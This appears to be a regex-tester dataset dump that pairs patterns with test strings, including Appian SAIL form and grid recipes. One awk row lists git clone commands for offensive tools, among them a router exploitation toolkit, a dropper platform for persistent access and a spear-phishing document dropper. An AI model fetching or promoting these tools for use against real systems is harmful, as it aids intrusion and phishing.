requiredMessage: "You must enter comments when you reject",
validationGroup: "reject"
)
},
buttons: a!buttonLayout(
primaryButtons: {
a!buttonWidgetSubmit(
label: "Approve",
value: true,
saveInto: local!hasApproved
),
a!buttonWidgetSubmit(
label: "Reject",
value: false,
saveInto: local!hasApproved,
validationGroup: "reject"
)
}
)
)
)
{% endhighlight %}
### Test it out ###
1. Click "Reject" without entering any comments. Notice that the custom required message that we configured using the `requiredMessage` parameter shows up rather than the generic product message.
1. Click Approve without entering any comments.
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface inputs: comments (Text), hasApproved (Boolean)
1. Remove the `load()` function
1. Delete local variables: `local!comments`, `local!hasApproved`
1. In your expression, replace:
- `local!comments` with `ri!comments`
- `local!hasApproved` with `ri!hasApproved`
1. In your process model, create variables: comments (Text) with no value, hasApproved (Text) with no value
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(comments: ac!comments, hasApproved: ac!hasApproved)`
- On a start form: `=rule!sailRecipe(comments: ac!comments, hasApproved: ac!hasApproved)`
---
layout: basic
title: Approve/Reject Buttons with Multiple Validation Rules
category: sailrecipe
---
### Goal ###
Present two buttons to the end user called "Approve" and "Reject". Also display a comments field. The number of characters in the comments field must not exceed 100 characters, regardless of the button clicked. Additionally, the user must enter comments if she clicks "Reject" (comments are required in this case).
*Note:*
- This design pattern is not recommended for offline interfaces because the conditional requiredness of a field based on user interaction requires a connection to the server.
- We recommend that you go through the [Approve/Reject Buttons with Conditional Requiredness](SAIL_Recipes.md#Approve/Reject_Buttons_with_Conditional_Requiredness) recipe before working on this one.
### Expression ###
{% highlight sail %}
=load(
local!comment,
local!hasApproved,
a!formLayout(
label: "SAIL Example: Approve Reject Buttons with Multiple Validation Rules",
firstColumnContents: {
with(
local!commentIsValid: if(len(local!comment)<=100, true, false),
a!paragraphField(
label: "Comments",
instructions: "Comments must have no more than 100 characters, regardless of the button clicked. Comments are required if rejecting.",
value: local!comment,
saveInto: local!comment,
required: local!commentIsValid,
requiredMessage: "You must enter comments when you reject",
validations: if(local!commentIsValid, "", "Comments must have no more than 100 characters"),
validationGroup: if(local!commentIsValid, "reject", "")
)
)
},
buttons: a!buttonLayout(
primaryButtons: {
a!buttonWidgetSubmit(
label: "Approve",
value: true,
saveInto: local!hasApproved
),
a!buttonWidgetSubmit(
label: "Reject",
value: false,
saveInto: local!hasApproved,
validationGroup: "reject"
)
}
)
)
)
{% endhighlight %}
### Test it out ###
1. Click "Reject" without entering any comments. Notice that the custom required message that we configured using the `requiredMessage` parameter shows up rather than the generic product message.
1. Enter more than 100 characters as comments, and click "Reject". Click "Approve'. You shouldn't be able to submit in either case.
1. Click "Approve" without entering any comments.
### To write your data to process ###
1. Save your interface as sailRecipe
1. Create interface inputs: comments (Text), hasApproved (Boolean)
1. Remove the `load()` function
1. Delete local variables: `local!comments`, `local!hasApproved`
1. In your expression, replace:
- `local!comments` with `ri!comments`
- `local!hasApproved` with `ri!hasApproved`
1. In your process model, create variables: comments (Text) with no value, hasApproved (Text) with no value
- On a task form, create node inputs
- On a start form, create process parameters
1. In your process model, enter your SAIL Form definition:
- On a task form: `=rule!sailRecipe(comments: ac!comments, hasApproved: ac!hasApproved)`
- On a start form: `=rule!sailRecipe(comments: ac!comments, hasApproved: ac!hasApproved)`
---
layout: basic
title: Display Data from a Record in a Grid
category: sailrecipe
---
**Goal**: Display data from a record type in a read-only paging grid.

This scenario demonstrates:
- How to use the report builder to generate a grid to display data from a record type.
- How to modify the generated expression to change the grid column alignment.
For this recipe, you'll need a record. Let's use the process-backed record from the [Records Tutorial](Records_Tutorial.md#Create_Process-Backed_Records). If you haven't already created the Expense Report record type, do so now by completing the first five steps of the "Create Process-Backed Records" tutorial and starting at least one instance of the process, then follow the steps below to generate a grid using the report builder.
1. Create a constant called `EXPENSE_REPORT_RECORD` with Record Type as the type and `Expense Report` as the Value.
1. Open the Interface Designer and select **Report Builder** from the list of templates.
1. In the *Source Constant* field, select the `EXPENSE_REPORT_RECORD`constant.
1. In the *Add a field...* dropdown, select `expenseDate` and click **Add Field**.
1. Set the display name for each of the three columns as `Item`, `Amount`, and `Date`, respectively.
1. Click **Generate**. You should see the following expression in the design pane on the left-hand side:
{% highlight sail %}
load(
local!pagingInfo: a!pagingInfo(
startIndex: 1,
batchSize: 20,
sort: a!sortInfo(
field: "expenseItem",
ascending: true
)
),
with(
local!datasubset: queryrecord(
cons!EXPENSE_REPORT_RECORD,
a!query(
selection: a!querySelection(columns: {
a!queryColumn(field: "expenseItem"),
a!queryColumn(field: "expenseAmount"),
a!queryColumn(field: "expenseDate"),
}),
pagingInfo: local!pagingInfo
)
),
a!gridField(
totalCount: local!datasubset.totalCount,
columns: {
a!gridTextColumn(
label: "Item",
field: "expenseItem",
data: index(local!datasubset.data, "expenseItem", null)
),
a!gridTextColumn(
label: "Amount",
field: "expenseAmount",
data: index(local!datasubset.data, "expenseAmount", null)
),
a!gridTextColumn(
label: "Date",
field: "expenseDate",
data: index(local!datasubset.data, "expenseDate", null)
),
},
value: local!pagingInfo,
saveInto: local!pagingInfo
)
)
)
{% endhighlight %}
<ol start="7">
<li>Right align the "Amount" and "Date" columns by modifying the expression as shown below:</li>
</ol>
{% highlight sail %}
load(
local!pagingInfo: a!pagingInfo(
startIndex: 1,
batchSize: 20,
sort: a!sortInfo(
field: "expenseItem",
ascending: true
)
),
with(
local!datasubset: queryrecord(
cons!EXPENSE_REPORT_RECORD,
a!query(
selection: a!querySelection(columns: {
a!queryColumn(field: "expenseItem"),
a!queryColumn(field: "expenseAmount"),
a!queryColumn(field: "expenseDate"),
}),
pagingInfo: local!pagingInfo
)
),
a!gridField(
totalCount: local!datasubset.totalCount,
columns: {
a!gridTextColumn(
label: "Item",
field: "expenseItem",
data: index(local!datasubset.data, "expenseItem", null)
),
a!gridTextColumn(
label: "Amount",
field: "expenseAmount",
data: index(local!datasubset.data, "expenseAmount", null),
alignment: "RIGHT"
),
a!gridTextColumn(
label: "Date",
field: "expenseDate",
data: index(local!datasubset.data, "expenseDate", null),
alignment: "RIGHT"
),
},
value: local!pagingInfo,
saveInto: local!pagingInfo
)
)
)
{% endhighlight %}
### Notable implementation details ###
- The grid generated by the report builder is already configured to page and sort.
- The query that populates this grid will return all data for the record type in batches of 20. To filter the data returned by the query, see also: [Filter Data from a Record in a Grid](#Filter_Data_from_a_Record_in_a_Grid)
---
layout: basic
title: Display Data with CDT Fields from a Record in a Grid
category: sailrecipe
---
**Goal**: Display data that contains CDT fields from a record type in a read-only paging grid.

This scenario demonstrates:
- How to use the report builder to generate a grid to display data from a record type.
- How to modify the generated expression to show data from a nested field in the grid.
For this recipe, you'll need a record. Let's use the process-backed record from the [Records Tutorial](Records_Tutorial.md#Create_Process-Backed_Records). If you haven't already created the Expense Report record type, do so now by completing the first five steps of the "Create Process-Backed Records" tutorial and starting at least one instance of the process, then follow the steps below to generate a grid using the report builder.
1. Create a constant called `EXPENSE_REPORT_RECORD` with Record Type as the type and `Expense Report` as the Value.
1. Open the Interface Designer and select **Report Builder** from the list of templates.
1. In the *Source Constant* field, select the `EXPENSE_REPORT_RECORD`constant.
1. Set the display name for each of the columns as `Item` and `Amount`, respectively.
1. Click **Generate**. You should see the following expression in the design pane on the left-hand side:
{% highlight sail %}
load(
local!pagingInfo: a!pagingInfo(
startIndex: 1,
batchSize: 20,
sort: a!sortInfo(
field: "expenseItem",
ascending: true
)
),
with(
local!datasubset: queryrecord(
cons!EXPENSE_REPORT_RECORD,
a!query(
selection: a!querySelection(columns: {
a!queryColumn(field: "expenseItem"),
a!queryColumn(field: "expenseAmount"),
}),
pagingInfo: local!pagingInfo
)
),
a!gridField(
totalCount: local!datasubset.totalCount,
columns: {
a!gridTextColumn(
label: "Item",
field: "expenseItem",
data: index(local!datasubset.data, "expenseItem", null)
),
a!gridTextColumn(
label: "Amount",
field: "expenseAmount",
data: index(local!datasubset.data, "expenseAmount", null)
),
},
value: local!pagingInfo,
saveInto: local!pagingInfo
)
)
)
{% endhighlight %}
<ol start="6">
<li>Add a new query column for <code>pp.initiator</code> and a corresponding column in the grid by modifying the expression as shown below:</li>
</ol>
{% highlight sail %}
load(
local!pagingInfo: a!pagingInfo(
startIndex: 1,
batchSize: 20,
sort: a!sortInfo(
field: "expenseItem",
ascending: true
)
),
with(
local!datasubset: queryrecord(
cons!EXPENSE_REPORT_RECORD,
a!query(
selection: a!querySelection(columns: {
a!queryColumn(field: "expenseItem"),
a!queryColumn(field: "expenseAmount"),
a!queryColumn(field: "pp.initiator", alias: "initiator")
}),
pagingInfo: local!pagingInfo
)
),
a!gridField(
totalCount: local!datasubset.totalCount,
columns: {
a!gridTextColumn(
label: "Item",
field: "expenseItem",
data: index(local!datasubset.data, "expenseItem", null)
),
a!gridTextColumn(
label: "Amount",
field: "expenseAmount",
data: index(local!datasubset.data, "expenseAmount", null)
),
a!gridTextColumn(
label: "Requested By",
field: "initiator",
data: index(local!datasubset.data, "initiator", null)
)
},
value: local!pagingInfo,
saveInto: local!pagingInfo
)
)
)
{% endhighlight %}
### Notable implementation details ###
- The grid generated by the report builder is already configured to page and sort.
- Nested fields cannot be added through the report builder, so they must be added after the expression is generated.
- The query that populates this grid will return all data for the record type (in pages). If you want to return only a subset of data, add a default filter to the query. See also: [Filter Data from a Record in a Grid](#Filter_Data_from_a_Record_in_a_Grid)
---
layout: basic
title: Format Data from a Record in a Grid
category: sailrecipe
---
**Goal**: Format the data from a record type to display in a read-only paging grid, specifically a decimal number as a dollar amount and a username as a user's display name.

This scenario demonstrates:
- How to use the report builder to generate a grid to display data from a record type.
- How to modify the generated expression to show data from a nested field in the grid.
- How to format the data that is returned from the query to display in the grid.
For this recipe, you'll need a record. Let's use the process-backed record from the [Records Tutorial](Records_Tutorial.md#Create_Process-Backed_Records). If you haven't already created the Expense Report record type, do so now by completing the first five steps of the "Create Process-Backed Records" tutorial and starting at least one instance of the process, then follow the steps below to generate a grid using the report builder.
1. Create a constant called `EXPENSE_REPORT_RECORD` with Record Type as the type and `Expense Report` as the Value.
1. Open the Interface Designer and select **Report Builder** from the list of templates.
1. In the *Source Constant* field, select the `EXPENSE_REPORT_RECORD`constant.
1. Set the display name for each of the columns as `Item` and `Amount`, respectively.
1. Click **Generate**. You should see the following expression in the design pane on the left-hand side:
{% highlight sail %}
load(
local!pagingInfo: a!pagingInfo(
startIndex: 1,
batchSize: 20,
sort: a!sortInfo(
field: "expenseItem",
ascending: true
)
),
with(
local!datasubset: queryrecord(
cons!EXPENSE_REPORT_RECORD,
a!query(
selection: a!querySelection(columns: {
a!queryColumn(field: "expenseItem"),
a!queryColumn(field: "expenseAmount"),
}),
pagingInfo: local!pagingInfo
)
),
a!gridField(
totalCount: local!datasubset.totalCount,
columns: {
a!gridTextColumn(
label: "Item",
field: "expenseItem",
data: index(local!datasubset.data, "expenseItem", null)
),
a!gridTextColumn(
label: "Amount",
field: "expenseAmount",
data: index(local!datasubset.data, "expenseAmount", null)
),
},
value: local!pagingInfo,
saveInto: local!pagingInfo
)
)
)
{% endhighlight %}
<ol start="6">
<li>Add a new query column for <code>pp.initiator</code> and a corresponding column in the grid by modifying the expression as shown below:</li>
</ol>
{% highlight sail %}
load(
local!pagingInfo: a!pagingInfo(
startIndex: 1,
batchSize: 20,
sort: a!sortInfo(
field: "expenseItem",
ascending: true
)
),
with(
local!datasubset: queryrecord(
cons!EXPENSE_REPORT_RECORD,
a!query(
selection: a!querySelection(columns: {
a!queryColumn(field: "expenseItem"),
a!queryColumn(field: "expenseAmount"),
a!queryColumn(field: "pp.initiator", alias: "initiator")
}),
pagingInfo: local!pagingInfo
)
),
a!gridField(
totalCount: local!datasubset.totalCount,
columns: {
a!gridTextColumn(
label: "Item",
field: "expenseItem",
data: index(local!datasubset.data, "expenseItem", null)
),
a!gridTextColumn(
label: "Amount",
field: "expenseAmount",
data: index(local!datasubset.data, "expenseAmount", null)
),
a!gridTextColumn(
label: "Requested By",
field: "initiator",
data: index(local!datasubset.data, "initiator", null)
)
},
value: local!pagingInfo,
saveInto: local!pagingInfo
)
)
)
{% endhighlight %}
<ol start="7">
<li>Create an expression rule <code>ucUserDisplayName</code> with a single input <code>user</code> of type User and the following definition:</li>
</ol>
{% highlight sail %}
=user(ri!user, "firstName") & " " & user(ri!user, "lastName"){% endhighlight %}
<ol start="8">
<li>Format the "Amount" column using the <code>dollar</code> function to display the value in dollars and the "Requested By" column using <code>rule!ucUserDisplayName</code> to display the user's first and last name by modifying the expression as shown below:</li>
</ol>
{% highlight sail %}
load(
local!pagingInfo: a!pagingInfo(
startIndex: 1,
batchSize: 20,
sort: a!sortInfo(
field: "expenseItem",
ascending: true
)
),
with(
local!datasubset: queryrecord(
cons!EXPENSE_REPORT_RECORD,
a!query(
selection: a!querySelection(columns: {
a!queryColumn(field: "expenseItem"),
a!queryColumn(field: "expenseAmount"),
a!queryColumn(field: "pp.initiator", alias: "initiator")
}),
pagingInfo: local!pagingInfo
)
),
a!gridField(
totalCount: local!datasubset.totalCount,
columns: {
a!gridTextColumn(
label: "Item",
field: "expenseItem",
data: index(local!datasubset.data, "expenseItem", null)
),
a!gridTextColumn(
label: "Amount",
field: "expenseAmount",
data: dollar(index(local!datasubset.data, "expenseAmount", {}))
),
a!gridTextColumn(
label: "Requested By",
field: "initiator",
data: apply(rule!ucUserDisplayName, index(local!datasubset.data, "initiator", {}))
)
},
value: local!pagingInfo,
saveInto: local!pagingInfo
)
)
)
{% endhighlight %}
### Notable implementation details ###
- The grid generated by the report builder is already configured to page and sort.
- Nested fields cannot be added through the report builder, so they must be added after the expression is generated.
- The grid displays the text representation of all types, including Appian Objects such as a user, so we applied our own formatting.
- The query that populates this grid will return all data for the record type (in pages). If you want to return only a subset of data, add a default filter to the query. See also: [Filter Data from a Record in a Grid](#Filter_Data_from_a_Record_in_a_Grid)
---
layout: basic
title: Filter Data from a Record in a Grid
category: sailrecipe
---
**Goal**: Display data from a record type in a read-only paging grid and a dropdown to allow the user to filter the data that is displayed.
*Note:* This design pattern is not recommended for offline interfaces because filtering data based on user interaction requires a connection to the server.

This scenario demonstrates:
- How to use the report builder to generate a grid to display data from a record type.
- How to modify the generated expression to add a filter for the data.
For this recipe, you'll need a record. Let's use the process-backed record from the [Records Tutorial](Records_Tutorial.md#Create_Process-Backed_Records). If you haven't already created the Expense Report record type, do so now by completing the first five steps of the "Create Process-Backed Records" tutorial and starting at least one instance of the process, then follow the steps below to generate a grid using the report builder.
1. Create a constant called `EXPENSE_REPORT_RECORD` with Record Type as the type and `Expense Report` as the Value.
1. Open the Interface Designer and select **Report Builder** from the list of templates.
1. In the *Source Constant* field, select the `EXPENSE_REPORT_RECORD`constant.
1. Set the display name for each of the columns as `Item` and `Amount`, respectively.
1. Click **Generate**. You should see the following expression in the design pane on the left-hand side:
{% highlight sail %}
load(
local!pagingInfo: a!pagingInfo(
startIndex: 1,
batchSize: 20,
sort: a!sortInfo(
field: "expenseItem",
ascending: true
)
),
with(
local!datasubset: queryrecord(
cons!EXPENSE_REPORT_RECORD,
a!query(
selection: a!querySelection(columns: {
a!queryColumn(field: "expenseItem"),
a!queryColumn(field: "expenseAmount"),
}),
pagingInfo: local!pagingInfo
)
),
a!gridField(
totalCount: local!datasubset.totalCount,
columns: {
a!gridTextColumn(
label: "Item",
field: "expenseItem",
data: index(local!datasubset.data, "expenseItem", null)
),
a!gridTextColumn(
label: "Amount",
field: "expenseAmount",
data: index(local!datasubset.data, "expenseAmount", null)
),
},
value: local!pagingInfo,
saveInto: local!pagingInfo
)
)
)
{% endhighlight %}
<ol start="6">
<li>Add a filter to the query and a dropdown so that the user can select what data set to display by modifying the expression as shown below:</li>
</ol>
{% highlight sail %}
load(
local!pagingInfo: a!pagingInfo(
startIndex: 1,
batchSize: 20,
sort: a!sortInfo(
field: "expenseItem",
ascending: true
)
),
local!priceRange,
with(
local!datasubset: queryrecord(
cons!EXPENSE_REPORT_RECORD,
a!query(
selection: a!querySelection(columns: {
a!queryColumn(field: "expenseItem"),
a!queryColumn(field: "expenseAmount"),
}),
filter: if(
isnull(local!priceRange),
null,
a!queryFilter(
field: "expenseAmount",
operator: choose(local!priceRange, "<", "between", ">"),
value: choose(local!priceRange, 100, {100, 200}, 200)
)
),
pagingInfo: local!pagingInfo
)
),
{
a!dropdownField(
label: "Filter by Amount",
labelPosition: "ADJACENT",
choiceLabels: {"Less than $100", "$100 - $200", "Greater than $200"},
placeholderLabel: "All",
choiceValues: {1, 2, 3},
value: local!priceRange,
saveInto: {
local!priceRange,
/* We need to reset the paging info so that it goes back */
/* to the first page of the grid when the user changes */
/* the filter. Otherwise, the grid errors out */
a!save(local!pagingInfo.startIndex, 1)
}
),
a!gridField(
totalCount: local!datasubset.totalCount,
columns: {
a!gridTextColumn(
label: "Item",
field: "expenseItem",
data: index(local!datasubset.data, "expenseItem", null)
),
a!gridTextColumn(
label: "Amount",
field: "expenseAmount",
data: index(local!datasubset.data, "expenseAmount", null)
),
},
value: local!pagingInfo,
saveInto: local!pagingInfo
)
}
)
)
{% endhighlight %}
### Test it out ###
1. Select the "Less than $100" option from the filter dropdown. Notice that only items where the amount is less than $100 are displayed in the grid.
### Notable implementation details ###
- The grid generated by the report builder is already configured to page and sort.
- Notice that when the user makes a selection from the dropdown, we’re always resetting the value of `local!pagingInfo` so that the user always sees the first page of results for the selected filter. This is necessary regardless of what the user has selected, so we ignore the value returned by the component (in this case, the value of the dropdown selection) and instead insert our own value.
---
layout: basic
title: Display Array of Data in a Grid
category: sailrecipe
---
### Goal ###
Display an array of CDT data in a read-only paging grid.

This scenario demonstrates:
- How to display an array of data in a read-only paging grid.
- How to configure paging and sorting in a read-only grid.
### Expression ###
{% highlight sail %}
=load(
local!data: {
{id: 1, name: "John Smith", department: "Engineering"},
{id: 2, name: "Michael Johnson", department: "Finance"},
{id: 3, name: "Mary Reed", department: "Engineering"},
{id: 4, name: "Angela Cooper", department: "Sales"},
{id: 5, name: "Elizabeth Ward", department: "Sales"},
{id: 6, name: "Daniel Lewis", department: "Human Resources"}
},
/* batchSize is 3 to show more than 1 page of data in this recipe. Increase it as needed. `*/
local!pagingInfo: a!pagingInfo(startIndex: 1, batchSize: 3, sort: a!sortInfo(field: "name", ascending: true)),
with(
local!datasubset: todatasubset(local!data, local!pagingInfo),
a!gridField(
label: "SAIL Example: Display Data in a Read-Only Paging Grid",
totalCount: local!datasubset.totalCount,
columns: {
a!gridTextColumn(
label: "ID",
field: "id",
data: index(local!datasubset.data, "id", {}),
alignment: "RIGHT"
),
a!gridTextColumn(
label: "Name",
field: "name",
data: index(local!datasubset.data, "name", {})
),
a!gridTextColumn(
label: "Department",
field: "department",
data: index(local!datasubset.data, "department", {})
)
},
value: local!pagingInfo,
saveInto: local!pagingInfo
)
)
)
{% endhighlight %}
### Test it out ###
1. Go to the second page of the grid. Notice that grid data changes to show the next batch of data.
1. Sort the grid by clicking on one of the column headers. Notice that the grid goes back to the first page and displays the data in the correct order.
**Offline**
This expression shows how to modify the above expression for offline use. The only difference is that all rows are displayed initially since grid paging is not available when offline.
{% highlight sail %}
=load(
local!data: {
{id: 1, name: "John Smith", department: "Engineering"},
{id: 2, name: "Michael Johnson", department: "Finance"},
{id: 3, name: "Mary Reed", department: "Engineering"},
{id: 4, name: "Angela Cooper", department: "Sales"},
{id: 5, name: "Elizabeth Ward", department: "Sales"},
{id: 6, name: "Daniel Lewis", department: "Human Resources"}
},
local!pagingInfo: a!pagingInfo(startIndex: 1, batchSize: -1, sort: a!sortInfo(field: "name", ascending: true)),
with(
local!datasubset: todatasubset(local!data, local!pagingInfo),
a!gridField(
label: "SAIL Example: Display Data in a Read-Only Paging Grid",
totalCount: local!datasubset.totalCount,
columns: {
a!gridTextColumn(
label: "ID",
field: "id",
data: index(local!datasubset.data, "id", {}),
alignment: "RIGHT"
),
a!gridTextColumn(
label: "Name",
field: "name",
data: index(local!datasubset.data, "name", {})
),
a!gridTextColumn(
label: "Department",
field: "department",
data: index(local!datasubset.data, "department", {})
)
},
value: local!pagingInfo,
saveInto: local!pagingInfo
)
)
)
{% endhighlight %}
### Notable implementation details ###
- Notice that `local!pagingInfo` is a `load()` variable and `local!datasubset` is a `with()` variable. This allows us to save a new value into `local!pagingInfo` when the user interacts with the grid and then use that value to re | Find goals on recipe pages | 2016-08-25T22:27:00.000Z |
|
bash | '$1=="####"{x=$0;next} $1=="###"{print x, $0; next} 1' | #### linkedin-scraper
### Scrapes the public profile of the linkedin page
git clone https://github.com/yatish27/linkedin-scraper.git
#### rext
### Router EXploitation Toolkit - small toolkit for easy creation and usage of various python scripts that work with embedded devices.
git clone https://github.com/j91321/rext.git
#### in-hackers-mind
### Cyber Security: In Hacker's Mind
git clone https://github.com/Octosec/in-hackers-mind.git
#### tap
### The TrustedSec Attack Platform is a reliable method for droppers on an infrastructure in order to ensure established connections to an organization.
git clone https://github.com/trustedsec/tap.git
#### DocDropper
### REB00T Spear Phishing
git clone https://github.com/tfairane/DocDropper.git
#### WebAppSec
### Web Application Security
git clone https://github.com/ajinabraham/WebAppSec.git | bash | 2015-12-31T17:46:23.000Z |
CLeveland, OH ||| SanDiego, CA this regex will pick up on those | ^[A-Z]{1}[a-z]{1,15}(,)\s[A-Z]{2}$ | Cleveland, OH | 2015-02-22T17:37:10.000Z |
|
http://www.r-project.org/mail.html | (<li><p><a href="https:\/\/stat.ethz.ch\/(m.*r-sig-)(.*)">.*) |
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-mac"><code>R-SIG-Mac</code></a>: R Special Interest Group on Mac ports of R</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-db"><code>R-SIG-DB</code></a>: R SIG on Database Interfaces</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-debian"><code>R-SIG-Debian</code></a>: R Special Interest Group for Debian ports of R</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-dynamic-models"><code>R-SIG-dynamic-models</code></a>: Special Interest Group for Dynamic Simulation Models in R</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-ecology"><code>R-SIG-ecology</code></a>: Using R in ecological data analysis</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-epi"><code>R-SIG-Epi</code></a>: R for epidemiological data analysis</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-fedora"><code>R-SIG-Fedora</code></a>: R Special Interest Group for Fedora and Redhat ports of R</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-finance"><code>R-SIG-Finance</code></a>: Special Interest Group for ‘R in Finance’</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-geo"><code>R-SIG-Geo</code></a>: R Special Interest Group on using Geographical data and Mapping</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-gr"><code>R-SIG-gR</code></a>: R SIG on gRaphical models</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-gui"><code>R-SIG-GUI</code></a>: R Special Interest Group on GUI Development</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-hpc"><code>R-SIG-HPC</code></a>: R SIG on High-Performance Computing</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-insurance"><code>R-SIG-Insurance</code></a>: Special Interest Group on using R in actuarial science and insurance</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-jobs"><code>R-SIG-Jobs</code></a>: R SIG List for Announcements of Jobs where R is used</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-mediawiki"><code>R-SIG-mediawiki</code></a>: R SIG on the R Extension for Mediawiki</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-mixed-models"><code>R-SIG-mixed-models</code></a>: R SIG on Mixed Effect Models, notably lmer() related</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-networks"><code>R-SIG-networks</code></a>: R SIG for users and developers of network- or graph-related software within R</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-phylo"><code>R-SIG-phylo</code></a>: R SIG on phylogenetic and comparative methods and analyses</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-qa"><code>R-SIG-QA</code></a>: R SIG on Quality Assurance & Validation</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-robust"><code>R-SIG-Robust</code></a>: R SIG on Robust Statistics</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-teaching"><code>R-SIG-teaching</code></a>: SIG on Teaching Statistics (and more) using R</p></li>
<li><p><a href="https://stat.ethz.ch/mailman/listinfo/r-sig-wiki"><code>R-SIG-Wiki</code></a>: SIG on the Development of an “R Wiki”</p></li>
</ul> | regrex expression | 2015-06-04T08:35:34.000Z |
handles atomic and combined tenor | ^(?'commodity'02)_(?'market'\w{3,})_(?'tenortype'CY)(?'tenoroffset'[1-9][0-9]?)?_(?'derivative'PHY|FUT) (?'period')(?'year'\d{4})\b$ | 02_AUT_CY_PHY 2017
02_GASPOOL_H_CY_PHY 2017
02_GASPOOL_L_CY_PHY 2017
02_NBP_CY_PHY 2017
02_MGP_CY_PHY 2017
02_NCG_H_CY_PHY 2017
02_NCG_L_CY_PHY 2017
02_OTE_CY1_PHY 2017
02_POLVP_CY1_PHY 2017
02_PEGN_CY1_PHY 2017
02_SVKVP_CY1_PHY 2017
02_TTF_H_CY1_PHY 2017
02_ZEEBRUGGE_H_CY1_PHY 2017
02_ZTP_H_CY10_PHY 2015
02_ZTP_L_CY99_PHY 2015 | EIM year | 2019-08-30T09:33:39.000Z |
[-][\w]{8}\. | P38_3062008153730_All C a circ038 - Certificato Quietanza Canone-k8vW6APY.pdf | MySQL | 2016-03-22T10:30:18.000Z |
|
(href|src|source|retinaSource|data)=(["|'][^"']*assets[^"']*\.\w{1,5})(\?[^"']*)?["|'] | <a href="javascript://" class="btn btn-continue-operation disabled">
<span>Continuar</span>
</a>
<a href='javascript://" class="btn btn-continue-operation disabled'>
<span>Continuar</span>
</a>
<ul class="footer-legal l-adjacent-list">
<li><a href="#external-content//genoma_transactional/cms_files/corporativo/seguridad-internet/index_transaccional.html" class="footer-legal-element clr-gray.html">{security}</a></li>
<li><a href='#external-content//genoma_transactional/cms_files/corporativo/sobre-ing/condiciones-servicio-tarifa_transaccional.html' class="footer-legal-element clr-gray">{link-legal-info-footer}</a></li>
</ul>
<link type="text/css" href=" assets/custom-css /infobolsa
.css" rel="stylesheet" media="all" charset="utf-8">
<div class="fingerprint-views-storage-content-img txt-c">
{>pp-image imageId="fingerprint-activation" altText="fingerprint-activation"
source="assets/images/fingerprint-activation.png"
retinaSource="assets/images/retina/fingerprint-activation@2x.png"/}
</div>
<img src="modules/cc-menu/assets/images/logo_cc.svg" alt="Components catalog">
<img src="assets/images/twyp_cash_circle.svg?query=34"> <img src="assets/ircle.svg?hgt=76">
{>pp-image imageId="budgets-tutorial-client-step3" altText="budget-tutorial-step3"
source="components/budgets-tutorial/ASSETS/images/budgets-tutorial-client-step3.png" {>pp-image imageId="budgets-tutorial-client-step3" altText="budget-tutorial-step3"
source="components/budgets-tutorial/ASSETS/images/budgets-tutorial-client-step3.png"
{>pp-image source="assets/images/svg/logoING.svg"/}
<div data-selector="logo-ing" class="padding-top-sm padding-left-sm pull-left">
<img id="logo" src="assets/images/svg/logoING.svg" class="img-svg svg-header-logo login-header">
</div>
<audio data-selector="customer-connected-audio">
<source src="modules/remote-advisor-agent/assets/audio/incomingCall.mp3" type="audio/mp3"/>
</audio>
<div class="col9">
<div class="declaration-image-div">{>pp-svg-image:no-products-other-bank imageId="declaration-image" source="./assets/images/life-insurance-contract/cuestionario_riesgos.svg"/}</div>
<p class="h5 clr-dark-gray lic-declaration-remark">{lic-risk-declaration-remark|s}</p>
</div>
<div data-region-id="login-dnie-image" class="login-dnie-image"><img src="assets/images/dni-logo.png"/></div> | Replace for HTML urls | 2018-05-21T06:55:08.000Z |
|
Singular | this.api[ ]?\([ ]?([0-9]+)[ ]?\).([^<]+)<([^\[\]>]+)>[ ]?\(([^;]+)\); | return this.api(1).post<IDevToolsStatus>('devTools/devMode/save', {
settings: settings
}); | StringyTyped | 2016-01-18T15:47:28.000Z |
"[^"]*"|'[^'\r\n]*'|[^;\r\n]* | registar.rs;"Rese
rved";Uprava za zajednicke poslove republickih organa
registri.rs;Active;CRI DOMAINS
sbra.rs;Active;CRI DOMAINS
automotiveserbia.rs;Reserved;Uprava za, zajednicke poslove republickih organa
businessinserbia.rs;Reserved;Uprava za zajednicke poslove republickih organa
export.rs;Reserved;Uprava za zajednicke poslove republickih organa
exportserbia.rs;Reserved;Uprava za zajednicke poslove republickih organa
fdi.rs;Reserved;Uprava za zajednicke poslove republickih organa
ictserbia.rs;Reserved;Uprava za zajednicke poslove republickih organa
invest.rs;Reserved;Uprava za zajednicke poslove republickih organa
investicije.rs;Reserved;Uprava za zajednicke poslove republickih organa
investinserbia.rs;Active;Eunet d.o.o.
izvoz.rs;Reserved;Uprava za zajednicke poslove republickih organa
organicserbia.rs;Reserved;Uprava za zajednicke poslove republickih organa
| CSV parser | 2015-08-18T23:03:58.000Z |
|
([a-zA-Z\:]){4,100}([a-zA-Z0-9]{8}[:-]([a-zA-Z0-9]{4}[:-]){3}[a-zA-Z0-9]{12}) | urn:vcloud:user:2998042f-b91d-4c16-9de8-7feaf5e711a8
| uri validate with a prefix | 2015-11-02T10:51:17.000Z |
|
